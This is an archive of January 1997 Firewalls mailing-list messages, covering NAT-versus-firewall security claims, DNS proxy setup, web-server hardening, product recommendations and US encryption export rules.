Now for a company that sells a Firewall, you'd have to wonder how much they understand security, wouldn't you? Never before have I ever seen anyone attempt to claim that NAT by itself makes your entire internal network secure from Internet hackers, but finally someone has actually done it. We don't need Firewalls any more folks, all we need is NAT. Too bad the NAT RFC doesn't mention that it was created to do away completely with Firewalls, we could have all saved ourselves a whole lot of effort and time.

Their network diagram describing how the system would be placed has it behind a router and in front of the internal LAN. So now someone would seem to think that it is highly desirable to dedicate an NT Workstation to the task of NAT-only. Me thinks you could probably get a new router that supports NAT for less money.
Maybe their marketing staff is made up of rejected Microsoft marketeers...???

Cheers,
Russ
R.C. Consulting, Inc. - NT/Internet Security Consulting

From firewalls-owner Thu Jan 2 18:21:37 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA02408 for firewalls-outgoing; Thu, 2 Jan 1997 18:01:47 -0800 (PST)
Received: from lint.cisco.com (lint.cisco.com [171.68.223.44]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id SAA02377 for ; Thu, 2 Jan 1997 18:01:36 -0800 (PST)
Received: from big-dogs.cisco.com ([171.68.53.75]) by lint.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id SAA20541; Thu, 2 Jan 1997 18:00:27 -0800 (PST)
Message-Id: <3.0.32.19970102210022.006a4e60@lint.cisco.com>
X-Sender: pferguso@lint.cisco.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Thu, 02 Jan 1997 21:00:24 -0500
To: makoski@future.dreamscape.com
From: Paul Ferguson
Subject: Re: Untrusted vs. trusted network security
Cc: Firewalls@GreatCircle.COM
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

See: RFC1579, 'Firewall-Friendly FTP', S. Bellovin, February 1994.

- paul

At 07:16 PM 1/2/97 -0500, Steve Matkoski wrote:
>Paul Ferguson wrote:
>
>> Ditto. PASV FTP works fine, lasts a long time. Even has growing
>> client support. :-)
>>
>Where can I find info on PASV mode?
>
>--
>
>Thanks!
>-steve.
>matkoski@dreamscape.com
>

--
Paul Ferguson                     ||        ||
Consulting Engineering            ||        ||
Herndon, Virginia USA            ||||      ||||
tel: +1.703.397.5938         ..:||||||:..:||||||:..
e-mail: pferguso@cisco.com    c i s c o S y s t e m s

From firewalls-owner Thu Jan 2 20:03:13 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA11516 for firewalls-outgoing; Thu, 2 Jan 1997 19:55:18 -0800 (PST)
Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA11506 for ; Thu, 2 Jan 1997 19:55:10 -0800 (PST)
Received: from ns1.ntshop.com by relay6.UU.NET with ESMTP (peer crosschecked as: [207.91.166.2]) id QQbwvn07502; Thu, 2 Jan 1997 22:53:55 -0500 (EST)
Received: from beast.ntshop.net ([207.91.166.3]) by ns1.ntshop.com (post.office MTA v2.0 0813 ID# 153-13296) with SMTP id AAA248; Thu, 2 Jan 1997 21:44:17 -0600
Received: by beast.ntshop.net with Microsoft Mail id <01BBF8F5.E246FE40@beast.ntshop.net>; Thu, 2 Jan 1997 21:42:42 -0600
Message-ID: <01BBF8F5.E246FE40@beast.ntshop.net>
From: Mark Joseph Edwards
To: "'Russ'"
Cc: "'firewalls@greatcircle.com'"
Subject: RE: NT NAT
Date: Thu, 2 Jan 1997 21:42:38 -0600
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Ok - I visited this site, and read every single word about OnGuard. I don't see anything on this site AT ALL that insinuates that this product -- by itself -- is all the protection your network needs. Nothing. Zip. Nada. Zilch.

They do, however, quite clearly, stress over and over that this product is an IP address translator (NAT). There IS one teeny tiny short sentence that says "Protects your internal IP servers and workstations from Internet hackers" and that's it. This doesn't say "we're a cure all" or "we're all you need", and it doesn't violate any "Truth in Advertising" ethics either.
Russ wrote - "Never before have I ever seen anyone attempt to claim that NAT by itself makes your entire internal network secure from Internet hackers, but finally someone has actually done it."

WRONG RUSS -- WRONG WRONG WRONG. HEY, IT DOESN'T SAY THAT IT DOES! To say the least, your comments are UNFAIR.

And, your cheap stab at MS.....geeez man, what's come over you? This list doesn't need that type of post, ya know?

mje

-----Original Message-----
From: Russ [SMTP:Russ.Cooper@RC.on.ca]
Sent: Thursday, January 02, 1997 6:36 PM
To: 'Jamie Thain'; firewalls@greatcircle.com
Cc: 'info@on.com'
Subject: RE: NT NAT

>There is now an NT NAT. http://www.on.com.

I hate to do this without looking at the product first, but here's an excerpt from their web page describing the features their IP Funnel product provides;

    .Protects your internal IP servers and workstations from Internet hackers

Now for a company that sells a Firewall, you'd have to wonder how much they understand security, wouldn't you? Never before have I ever seen anyone attempt to claim that NAT by itself makes your entire internal network secure from Internet hackers, but finally someone has actually done it. We don't need Firewalls any more folks, all we need is NAT. Too bad the NAT RFC doesn't mention that it was created to do away completely with Firewalls, we could have all saved ourselves a whole lot of effort and time.

Their network diagram describing how the system would be placed has it behind a router and in front of the internal LAN. So now someone would seem to think that it is highly desirable to dedicate an NT Workstation to the task of NAT-only. Me thinks you could probably get a new router that supports NAT for less money.

Maybe their marketing staff is made up of rejected Microsoft marketeers...???

Cheers,
Russ
R.C. Consulting, Inc.
- NT/Internet Security Consulting

From firewalls-owner Thu Jan 2 20:14:07 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA11643 for firewalls-outgoing; Thu, 2 Jan 1997 19:58:30 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id TAA11636 for ; Thu, 2 Jan 1997 19:58:23 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id TAA23463; Thu, 2 Jan 1997 19:57:03 -0800
Received: from upsmot01.msn.com(204.95.110.78) by mycroft via smap (V1.3mjr) id sma023459; Thu Jan 2 19:56:26 1997
Received: from upmajb06 ([204.95.110.89]) by upsmot01.msn.com (8.6.8.1/Configuration 4) with SMTP id TAA02157 for ; Thu, 2 Jan 1997 19:48:34 -0800
Date: Fri, 3 Jan 97 06:38:54 UT
From: "Tijani CHAOUCH BOURAOUI"
Message-Id:
To: Firewalls@GreatCircle.COM
Subject: RE: Firewalls-Digest V5 #699
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

----------
From: firewalls-digest-owner@GreatCircle.COM on behalf of Firewalls-Digest
Sent: Thursday, January 02, 1997 1:00 AM
To: firewalls-digest@GreatCircle.COM
Subject: Firewalls-Digest V5 #699

Firewalls-Digest        Thursday, January 2 1997        Volume 05 : Number 699

In this issue:

    Re: Christopher Klaus and ISS
    RE: Air Force Web Site Hacked
    Re: DNS Proxy and Internal Root Name Server

See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues.

----------------------------------------------------------------------

Date: Wed, 1 Jan 1997 19:06:25 -0500 (EST)
From: Todd Graham Lewis
Subject: Re: Christopher Klaus and ISS

On Tue, 31 Dec 1996, Robert Hanson wrote:

> no disrespect intended to you Todd, yet....
>
> kill! maim! shoot! my goodness... we are all capitalist pigs... what
> makes anyone better than anyone else standing next to them...

I not only like corporations, I work for one.
Believe it or not, I don't even have a problem with vendors discussing their products on the list. Those who offer help to newbies, contribute to technical discussions, etc., are more than entitled to mention once in a while "BTW (disclaimer: I work for 'em), our product X is designed to address this problem", or even to say "In light of the discussion last month, I thought that the list might be interested in our new product, SuperBlammo4000."

What I don't appreciate are bone-headed sales pitches coming from people who never participate in the discussions on the list, and whose sole purpose is to use the list as a free advertising channel. I don't think that this is too far off the mark, and the fact that Klaus is a complete asshole just makes the decision that much easier.

(BTW, I'm sorry I wasn't able to participate in the discussion about Linux firewalls. I was visiting family during the holidays.)

__
Todd Graham Lewis                                   Linux!
Core Engineering                       Mindspring Enterprises
tlewis@mindspring.com                    (800) 719 4664, x2804

------------------------------

Date: Thu, 2 Jan 1997 13:50:18 +0900
From: "Jason T. Luttgens"
Subject: RE: Air Force Web Site Hacked

Why not get Practical Unix and Internet Security from O'Reilly and do what it says. I bet if everyone disabled stupid services (on unix hosts), installed TCP wrappers to allow telnets from limited IP addresses, did Cisco's recommendations on preventing IP spoofing, used Linux or another free x86 Unix and ssh to telnet in, and subscribed to security mailing lists to keep up on things, these incidents would slow down a LOT...how many people out there have done this to their unix host?? Get to work you system admins! All this is your fault......
- ----------
From: Norm Laudermilch[SMTP:norm@UU.NET]
Sent: Wednesday, January 01, 1997 8:57 AM
To: firewalls@greatcircle.com
Subject: Re: Air Force Web Site Hacked

[from Michael Idengren:]
> I don't know about the rest of you but I agree with the idea of putting a
> webserver on a CD-ROM.

[from Thomas Leitner:]
> why not just put it on a separate disk which is mounted
> read-only?

[from Dale Drew:]
> Using a CDROM web-server doesn't provide resistance to an
> attacker who gains access to the system as ROOT...

Keep in mind that this entire thread assumes that the attacker will *not* take an easier approach, such as compromising the DNS records that point to the server. In this case, the attacker can create any web content they like, spend all the time in the world creating it, and then quickly convince the DNS servers that www.foo.com now resolves to the new (fake) address. Securing your www server is just a first (although important) step.

I do think read-only media is an interesting idea, by the way :) Dale is right though, there are still vulnerabilities. Personally, I like the idea of marking the files immutable myself. This way, even root can't change the content unless the machine is brought down into single-user mode. Not sure how many other operating systems support this other than (the great) BSDI though.

Happy new year (2 minutes to go...),

Norm

- ----------------------------------------------------------------------
Have you cleaned your packet filter lately? - Josh Osborne
- ----------------------------------------------------------------------
Norm Laudermilch                  E-mail: norm@uu.net
Manager, Information Security     Phone: 703-206-5952
UUNET Technologies, Inc.
3060 Williams Drive
Fairfax, VA 22031-4648
- ----------------------------------------------------------------------

------------------------------

Date: Thu, 02 Jan 1997 09:03:03 +0100
From: Jean-Francois ZWOBADA
Subject: Re: DNS Proxy and Internal Root Name Server

At 16:59 31/12/1996 -0500, R. McMahon wrote:
>Background:
>I am looking at setting up a DNS proxy using "forwarders" and "slave"
>lines in my /etc/named.boot file as described in the "Building
>Firewalls" and "DNS and BIND" books by O'Reilly. However, I want to do
>this where I can maintain an internal Root name server. For resolution
>of domain names outside the internal top-level domains, I would like the
>proxy name server (which will have an "external" domain name) to be the
>only name server queried by the internal root name server and having
>this proxy be the only host to query external name servers. (I would
>set up UDP port 53 filtering on the router.)
>
>Problem:
>One problem I thought of concerns the mitigation between the internal
>root name server and the forwarders/slave lines. If a subordinate
>domain name server queries the root name server for an "outside" domain,
>how would it know to forward the query to the proxy (being that it is an
>internal root name server)? I could have my subordinate top-level
>domain name servers query the proxy directly by putting a forwarders line
>in its /etc/named.boot, however, this would bypass the internal root
>structure. It seems to be straightforward w/o an internal root name
>server, however, I need to maintain these root name servers. Can anyone
>help?
>
>Thanks,
>
>rwm
>

The problem with an internal root server is that it won't take any account of your forwarders & slave options because it is said to be a root server. The only solution I can think of is adding the noforward patch to the named daemons of the first-level name servers you have under your root server. You just have to specify all the domains known by your internal root nameserver so that your lower-level nameserver would query it but would forward to your proxy for everything else.

Hope this helps

Jean-Francois

PS: the noforward patch is available for BIND on ftp.vix.com (but I can't remember the path...)
------------------------------

End of Firewalls-Digest V5 #699
*******************************

To unsubscribe from Firewalls-Digest, send the following command in the body of a message to "Majordomo@GreatCircle.COM":

    unsubscribe firewalls-digest

If you want to subscribe or unsubscribe an address other than the account the mail is coming from, such as a local redistribution list, then append that address to the command; for example, to subscribe "local-firewalls":

    subscribe firewalls-digest local-firewalls@your.domain.net

A non-digest (direct mail) version of this list is also available; to subscribe to that instead, replace all instances of "firewalls-digest" in the commands above with "firewalls".

Compressed back issues are available for anonymous FTP from FTP.GreatCircle.COM, in pub/firewalls/digest/vNN.nMMM.Z (where "NN" is the volume number, and "MMM" is the issue number).

From firewalls-owner Thu Jan 2 20:44:19 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA13029 for firewalls-outgoing; Thu, 2 Jan 1997 20:36:26 -0800 (PST)
Received: from cmn.cmn.net ([206.168.145.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id UAA12980 for ; Thu, 2 Jan 1997 20:36:13 -0800 (PST)
Received: (from uucp@localhost) by cmn.cmn.net (8.8.4/8.6.12) with UUCP id VAA01378 for firewalls@greatcircle.com; Thu, 2 Jan 1997 21:34:54 -0700
Received: from localhost (root@localhost) by gunshot.victim.com (8.8.4/8.6.12) with SMTP id VAA02466 for ; Thu, 2 Jan 1997 21:30:53 -0800
Date: Thu, 2 Jan 1997 21:30:52 -0800 (PST)
From: Dave Pifke
To: firewalls@greatcircle.com
Subject: http://www.victim.com
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

For all of you out there who cut and pasted the URL for the 'phf' hack, expect a nastygram in your postmaster's mailbox.
I have a trojan /cgi-bin/phf program that automatically sends mail to root, postmaster, and abuse at your domain before returning a false 404 message.

Somebody brought to my attention that a message went out over this list showing "victim.com" as an example site. It goes to show that you shouldn't believe everything you read. ;-)

Reply to me directly, as I don't subscribe to this list. Ask nicely and I'll send you the source (in Perl).

--
Dave Pifke, root@victim.com
System Administrator/Network Grease Monkey
Information Victim Technologies

From firewalls-owner Thu Jan 2 21:33:55 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA18790 for firewalls-outgoing; Thu, 2 Jan 1997 21:25:24 -0800 (PST)
Received: from www.uob.com.sg (www.uob.com.sg [203.120.52.254]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id VAA18774 for ; Thu, 2 Jan 1997 21:25:12 -0800 (PST)
Received: from novix ([202.42.213.254]) by www.uob.com.sg (post.office MTA v1.9.3 **** trial license expired ****) with SMTP id AAA171 for ; Fri, 3 Jan 1997 13:29:59 +0800
X-Sender: lawrenceting@www.uob.com.sg
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@greatcircle.com
From: lawrenceting@www.uob.com.sg (Lawrence Ting)
Subject: Any Recommendations?
Date: Fri, 3 Jan 1997 13:29:59 +0800
Message-ID: <19970103052958912.AAA171@novix>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Good day,

I'm in the midst of evaluating BlackHole, Gauntlet and Firewall-1 as a proxy-based firewall, while evaluating Sunscreen, CISCO PIX and Proteon GTX Secure as an IP-less packet-filtering firewall. Firewall-1 seemed more like a packet-filtering firewall, while I have a hard time distinguishing a better choice between BlackHole and Gauntlet. As for Sunscreen, it is a definitely more expensive choice than the other two.
Can someone please kindly share your expertise or comments or experience on the above-mentioned products in terms of their functionalities?

Thanks in advance.

Lawrence TING
Network Security Officer

From firewalls-owner Fri Jan 3 00:30:09 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA01611 for firewalls-outgoing; Fri, 3 Jan 1997 00:23:11 -0800 (PST)
Received: from relay1.shore.net (relay1.shore.net [192.233.85.129]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA01591 for ; Fri, 3 Jan 1997 00:23:01 -0800 (PST)
Received: from northshore.shore.net (root@shell1.shore.net [192.233.85.1]) by relay1.shore.net (8.8.3/8.8.3) with ESMTP id DAA09247; Fri, 3 Jan 1997 03:22:33 -0500 (EST)
Received: from [206.243.166.124] (max1-124.mfs.shore.net [206.243.166.124]) by northshore.shore.net (8.8.3/8.8.3) with ESMTP id DAA02265; Fri, 3 Jan 1997 03:22:25 -0500 (EST)
X-Sender: vin@shore.net
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Fri, 3 Jan 1997 03:22:17 -0500
To: firewalls@greatcircle.com
From: Vin McLellan
Subject: The Looong Reach of US Crypto-Export Controls
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I earlier posted a message which quoted a well-informed Netizen who claimed that the new US Federal ERA regs (which transfer control of many encryption exports from the U.S. Dept. of State to the U.S. Commerce Dept) now explicitly forbid the unlicensed export of software "designed or modified to protect against malicious computer damage, e.g., viruses" (c.3., below).

Tell the truth, I couldn't quite believe they had done it! (A whole new _class_ of export controls? Over very basic computer security tech, so vaguely described? Tucked into the fine print of a regulatory rewrite which the Administration has widely touted as a "compromise" with market-hungry US Industry and concerned compsec professionals!?!
And with the DC rumor mill full of claims that the heavy-handed ERA language reflected the FBI's ambitions for a domestic GAK bill, not the NSA/DoD's spooky Infowar concerns.)

Also, the fact that I had posted a citation of such import without having dug up the original doc myself bothered me. So, in the wee hours, I arose from my snug bed, kicked the sleeping PC awake, and burrowed into the Federal Register... hunting (as it turned out) for Supplement No. 2 to Part 774 of the ERA: "General Technology and Software Notes."

(Please note that American citizens and U.S. firms and organizations have but _ten_ days left, see below, to submit their comments on this "Interim Final Rule" -- which already has the force of Law -- to Commerce and their Congressfolk. E-mail, phone, and fax numbers for US Senators and Congressmen are at:

You might prefer to write a brief note for the US Mail; less than half the members of the US Congress have e-mail addresses. Which perhaps explains a little about how this silliness could happen;-)

Here's the source code, so to speak:

List of Items Controlled
Unit: $ value
Related Controls: NA
Related Definitions: N/A
Items:
a. ``software'' specially designed or modified for the ``development'', ``production'' or ``use'' of equipment or ``software'' controlled by 5A002, 5B002 or 5D002.
b. ``Software'' specially designed or modified to support ``technology'' controlled by 5E002.
c. Specific ``software'' as follows:
c.1. ``Software'' having the characteristics, or performing or simulating the functions of the equipment controlled by 5A002 or 5B002;
Note: 5D002.c.1 includes controls key escrow encryption software transferred from the U.S. Munitions List following a case-by-case determination by the Department of State through the commodity jurisdiction procedure. See Sec. 742.15 of the EAR.
c.2. ``Software'' to certify ``software'' controlled by 5D002.c.1;
c.3. ``Software'' designed or modified to protect against malicious computer damage, e.g., viruses;
Note: 5D002 does not control:
a. ``Software'' required for the ``use'' of equipment excluded from control under the Note to 5A002.
b. ``Software'' providing any of the functions of equipment excluded from control under the Note to 5A002.

__Below: Info Header of the Document as Published__

[Federal Register: December 13, 1996 (Volume 61, Number 241)]
[Rules and Regulations]
[Page 65642-65467]
From the Federal Register Online via GPO Access [wais.access.gpo.gov]

=======================================================================
-----------------------------------------------------------------------
DEPARTMENT OF COMMERCE
Bureau of Export Administration
15 CFR Parts 734, 740, 742, 762 and 774
[Docket No. 960918265-6296-02]
RIN 0694-AB09
Licensing of Key Escrow Encryption Equipment and Software
AGENCY: Bureau of Export Administration, Commerce.
ACTION: Interim final rule.
-----------------------------------------------------------------------

This interim final rule amends the Export Administration Regulations (EAR) by imposing national security controls on Key escrow information security (encryption) equipment and software transferred from the U.S. Munitions List to the Commerce Control List following a commodity jurisdiction determination by the Department of State. This interim final rule also amends the EAR to exclude key escrow items from the de minimis provisions for items exported from abroad and to exclude key escrow encryption software from mass market eligibility. Further, key escrow encryption software is subject to the EAR even when made publicly available.

DATES: Effective date. This rule is effective December 13, 1996. Comment date: Comments should be submitted on or before January 13, 1997.
ADDRESSES: Written comments should be sent to Nancy Crowe, Regulatory Policy Division, Office of Exporter Services, Bureau of Export Administration, Room 2705, 14th Street and Pennsylvania Avenue, N.W., Washington, D.C. 20230.
--------------------------------------------------------------------------

Suerte,
_Vin

Vin McLellan + The Privacy Guild + 53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548

From firewalls-owner Fri Jan 3 01:29:42 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA03719 for firewalls-outgoing; Fri, 3 Jan 1997 00:59:46 -0800 (PST)
Received: from news.rc.on.ca ([207.176.151.6]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA03688 for ; Fri, 3 Jan 1997 00:59:36 -0800 (PST)
Received: by mail.rc.on.ca with Internet Mail Service (5.0.1389.3) id <01BBF92A.24780A50@mail.rc.on.ca>; Fri, 3 Jan 1997 03:56:47 -0500
Message-ID: <41FDA823FC5AD011A0970000E8D5C66771A6@mail.rc.on.ca>
From: Russ
To: "'Mark Joseph Edwards'"
Cc: "'Firewalls Mailing List'"
Subject: RE: NT NAT
Date: Fri, 3 Jan 1997 03:56:45 -0500
X-Priority: 3
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.0.1389.3)
Content-Type: text/plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

They made the statement I quoted, I didn't. I quoted it precisely from their web page, and then added my commentary. What do you think they were trying to say when they said it "protects your internal IP servers and workstations from Internet hackers", if not that it COMPLETELY protects them? How difficult would it have been to say that it "adds protection..."? Which still would have been WRONG, WRONG, WRONG.

Not only do they make that statement, but on the same page as that statement (http://www.on.com/ipfunnel/ogipfeat.htm) they have a network diagram that shows the On Guard IP Funnel as the only device between the internal network and the router connecting to the Internet. That's their diagram bud.
They don't show any Firewall anywhere in sight. So I see no reason why my message is unfair in any way, shape, or form. As for my comment about Microsoft, I said REJECTED Microsoft marketeers, you know, the ones that Microsoft wouldn't want working there because their too free with their words. This isn't a flame against Microsoft, duh. You got anything intelligent to say on just why you think NAT offers ANY SECURITY AT ALL??? I can't wait to hear it. I mean ANY SECURITY AT ALL. Let me say it again so there's no misunderstanding; TELL ME WHAT SECURITY IP FUNNEL (with the features listed) PROVIDES TO A NETWORK EXPOSED TO THE INTERNET WITH NOTHING ELSE BUT A ROUTER BETWEEN THEIR TRUSTED MACHINES AND THE WILD BLUE YONDER AS SHOWN IN THE IP FUNNEL NETWORK DIAGRAM. Russ R.C. Consulting, Inc. - NT/Internet Security Consulting From firewalls-owner Fri Jan 3 02:28:55 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA09810 for firewalls-outgoing; Fri, 3 Jan 1997 02:15:49 -0800 (PST) Received: from iva.laus.hr ([194.152.247.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id CAA09748 for ; Fri, 3 Jan 1997 02:15:18 -0800 (PST) Received: from sioux.dbk.laus.hr by iva.laus.hr (AIX 3.2/UCB 5.64/4.03) id AA21519; Fri, 3 Jan 1997 11:11:19 +0100 Message-Id: <1.5.4.32.19970103091312.00904024@laus.dbk.laus.hr> X-Sender: mario@laus.dbk.laus.hr X-Mailer: Windows Eudora Light Version 1.5.4 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 03 Jan 1997 11:13:12 +0200 To: firewalls@greatcircle.com From: Mario Misic Subject: sendmail 8.8.4 with firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi ! I am running sendmail-8.8.4 on AIX-3.2.5. My problem is how to configure sendmail-8.8.4 to send mail over my firewall server ! I configure sendmail.cf like they said in README file but .......... ? Thanks. 
http://www.laus.hr/
M.M

From firewalls-owner Fri Jan 3 05:18:30 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA18312 for firewalls-outgoing; Fri, 3 Jan 1997 05:11:02 -0800 (PST)
Received: from cat.bbsr.edu (cat.bbsr.edu [198.116.91.161]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA18295 for ; Fri, 3 Jan 1997 05:10:54 -0800 (PST)
Message-Id: <199701031310.FAA18295@miles.greatcircle.com>
Received: from [198.168.1.45] by cat.bbsr.edu (SMTPD32-3.00) id A4C62DDE002A; Fri Jan 03 09:08:22 1997
From: "Jamie Thain"
To: "Russ" ,
Cc: "'info@on.com'"
Subject: Re: NT NAT
Date: Fri, 3 Jan 1997 09:06:48 -0400
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Russ,

>> .Protects your internal IP servers and workstations from Internet hackers

Well, a NAT is one of the tools. Hey, some people put up a single layer "high quality" firewall that offers protection, aka-> network-1, on-guard, firewall/plus, and feel they are protected. Most of these vendors make the same claim. And if you had a single connectionless ip port, it would offer a lot of protection from getting in...

regards: jamie

From firewalls-owner Fri Jan 3 05:44:46 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA19598 for firewalls-outgoing; Fri, 3 Jan 1997 05:37:10 -0800 (PST)
Received: from ops.wfc.com (ops.wfc.com [199.171.126.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA19588 for ; Fri, 3 Jan 1997 05:37:00 -0800 (PST)
Received: from pcmis3.wfc.com by ops.wfc.com with SMTP id AA14759; Fri, 3 Jan 97 07:40:52 -0600
Message-Id: <9701031340.AA14759@ops.wfc.com>
Comments: Authenticated sender is
From: "Bill DeGan"
Organization: Walker Financial Corp.
To: firewalls@greatcircle.com
Date: Fri, 3 Jan 1997 08:33:11 300
Subject: Virus Scan Software
Reply-To: bill2@ops.wfc.com
X-Mailer: Pegasus Mail for Windows (v2.01)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Not sure if this is a proper question for this group, but here goes.

We are evaluating virus scan software to be installed on individual PCs and would welcome recommendations. We have folks that like McAfee and Norton but have no solid way to compare. Any help would be appreciated.

Bill DeGan
Walker Financial Corp.

From firewalls-owner Fri Jan 3 06:23:17 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA21294 for firewalls-outgoing; Fri, 3 Jan 1997 06:01:59 -0800 (PST)
Received: from boca.dsmith.nai.net (Danbury-Usr2-13.nai.net [208.133.164.70]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA21274 for ; Fri, 3 Jan 1997 06:01:45 -0800 (PST)
Received: from boca.dsmith.nai.net (dsmith@localhost [127.0.0.1]) by boca.dsmith.nai.net (8.7.4/8.6.12) with ESMTP id JAA11930 for ; Fri, 3 Jan 1997 09:25:24 -0500 (EST)
Message-Id: <199701031425.JAA11930@boca.dsmith.nai.net>
X-Mailer: exmh version 1.6.5 12/8/95
From: "David T. Smith"
To: Firewalls@greatcircle.com
Subject: Re: DNS Proxy and Internal Root Name Server
In-reply-to: Your message of "Thu, 02 Jan 1997 16:21:44 PST." <32CC5118.5FB8@csc.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 03 Jan 1997 09:25:21 -0500
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In message <32CC5118.5FB8@csc.com>, Adam Safier writes:
>I'm missing something in this DNS discussion. Don't make the internal
>"root" a root, make it your "main" DNS server with a limited cache
>file. You set the "main" internal DNS server to act as a recursive
>resolver for all internal DNS servers.

Here's the problem: BIND does forwarder lookups before doing cache lookups.
Therefore, unless the "main" internal DNS server is also a secondary for ALL internal zones, the internal zones will be sent to the external resolver for resolution.

With some firewalls, the external resolver can be configured as a 'hidden' secondary of the internal top level domain and thus provide recursive resolution. However, that exposes the internal domain to the Internet (albeit only to a knowledgeable invader) and may not be appropriate for some companies. In addition, with firewalls that provide automatic split DNS services, that option may not be available since they would not make the internal network accessible from the external firewall.

We are looking at a solution similar to the one posted earlier where the order of resolution is changed in the BIND code: instead of resolution being performed in the order 1) authoritative, 2) forwarded and 3) cached, we believe that it may be useful to perform it in the order 1) authoritative, 2) cached, and 3) forwarded in the case of firewalled environments.

David Smith
--
//==========================================================\\
||David T. Smith                | Specialists in           ||
||Tucker Network Technologies   | Network Computing        ||
||50 Washington St., PO 429     | --------------------     ||
||South Norwalk, CT 06856       | dsmith@tuckernet.com     ||
\\=========================================================//

From firewalls-owner Fri Jan 3 07:49:25 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA26577 for firewalls-outgoing; Fri, 3 Jan 1997 07:22:27 -0800 (PST)
Received: from europa.lif.icnet.uk (europa.lif.icnet.uk [143.65.1.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA26556 for ; Fri, 3 Jan 1997 07:21:54 -0800 (PST)
From: harley@icrf.icnet.uk
Message-Id: <199701031521.HAA26556@miles.greatcircle.com>
Received: by europa.lif.icnet.uk; Fri, 3 Jan 1997 15:20:35 GMT
Subject: re: Virus Scan Software
To: firewalls@greatcircle.com
Date: Fri, 3 Jan 1997 15:20:35 +0000 (GMT)
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Not sure if this is a proper question for this group, but here goes.

It probably isn't, except in so far as it's always worth reiterating that there's more security mileage in protecting the desktop -at- the desktop than in relying solely on viruswalls and firewalls which attempt to include filtering for viruses. ;-) I'm enclosing some info, and I'm always happy to discuss further by e-mail.

> We are evaluating virus scan software to be installed on individual
> PC's and would welcome recommendations.

Asking a firewalls list for recommendations in this case is asking your butcher's advice on buying fish. He -may- be well-qualified to advise you: OTOH he may know nothing about fish, he may regard fish as beneath him, and he may feel compelled as a catering professional to pretend he knows more about fish than he really does.
B-) Not everyone on this list is a firewalls expert or security guru: those who do fall into one of these categories aren't necessarily up to speed on PCs or viruses. In fact, virus mythology is as rife among security professionals as it is everywhere else. You may get responses that reflect what's in use at sites with representatives here, but that's not the same as recommendations for best practice.

> We have folks that like
> McAfee and Norton but have no solid way to compare.

